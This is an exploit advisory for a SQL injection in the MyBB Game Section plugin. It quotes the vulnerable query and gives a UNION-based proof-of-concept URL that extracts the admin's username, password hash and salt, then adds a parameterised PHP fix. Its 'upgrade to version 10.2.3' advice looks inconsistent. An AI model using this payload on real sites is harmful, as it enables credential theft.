MyBB plugin Game Section <= 1.2.2 SQL injection


# Exploit Title: MyBB plugin Game Section <= 1.2.2 SQL injection
# Date: 13/08/2013
# Exploit Author: Groucho
# Vendor Homepage: http://mods.mybb.com/view/game-section
# Version: 1.2.2
# Tested on: Debian

Introduction
============

Game Section is a MyBB plugin that lets you create a whole section of Flash games inside your MyBB forum.
Unfortunately, it's vulnerable to a SQL injection.

SQL injection
=============

--------------------[inc/plugins/games.php]-------------------------
L 651

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."games WHERE title LIKE '%".$title."%' AND active='1' ORDER BY title ASC");

--------------------[inc/plugins/games.php]-------------------------
The $title variable comes directly from user input and is concatenated into the query without escaping.

PoC:

http://[site]/[path]/xmlhttp.php?action=games_search&title=' union select 1,2,concat(username, 0x3a, password, 0x3a, salt),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from mybb_users WHERE uid=1-- -
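
The same search query rewritten so that the title is bound as data instead of spliced into the SQL text, as an added example that is not the plugin's own code. It runs stand-alone on an in-memory SQLite database through PDO; in the real plugin the equivalent wildcard escaping is MyBB's $db->escape_string_like(), and the table, sample rows and the escapeLikePattern()/searchGames() names are assumptions made for this example.

```php
<?php
// Added example (not the plugin's code): parameterised version of the
// games search. Uses PDO + SQLite so it runs without a MyBB install.

function escapeLikePattern(string $input): string
{
    // Backslash is declared as the ESCAPE character in the query, so escape
    // it first, then the two LIKE metacharacters. Without this a search for
    // "%" alone would match every row, even with parameter binding.
    return str_replace(['\\', '%', '_'], ['\\\\', '\\%', '\\_'], $input);
}

function searchGames(PDO $db, string $title): array
{
    // The pattern travels as a bound parameter, so a quote in $title cannot
    // terminate the string literal and append new SQL to the statement.
    $stmt = $db->prepare(
        "SELECT id, title FROM games
          WHERE title LIKE ? ESCAPE '\\' AND active = 1
          ORDER BY title ASC"
    );
    $stmt->execute(['%' . escapeLikePattern($title) . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data standing in for the plugin's games table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE games (id INTEGER PRIMARY KEY, title TEXT, active INTEGER)");
$db->exec("INSERT INTO games (title, active) VALUES
           ('Asteroids', 1), ('100% Snake', 1), ('Hidden Pac_Man', 0)");

// An ordinary substring search.
var_dump(array_column(searchGames($db, 'aster'), 'title'));
// Injection-shaped input is treated as a literal title to look for.
var_dump(array_column(searchGames($db, "' UNION SELECT 1--"), 'title'));
// A lone "%" only matches titles that actually contain a percent sign.
var_dump(array_column(searchGames($db, '%'), 'title'));
```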

Solution
========

Upgrade to version 10.2.3.

Thanks
======

All hwc members: Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s.
Please visit: http://hwc-crew.org/

Groucho
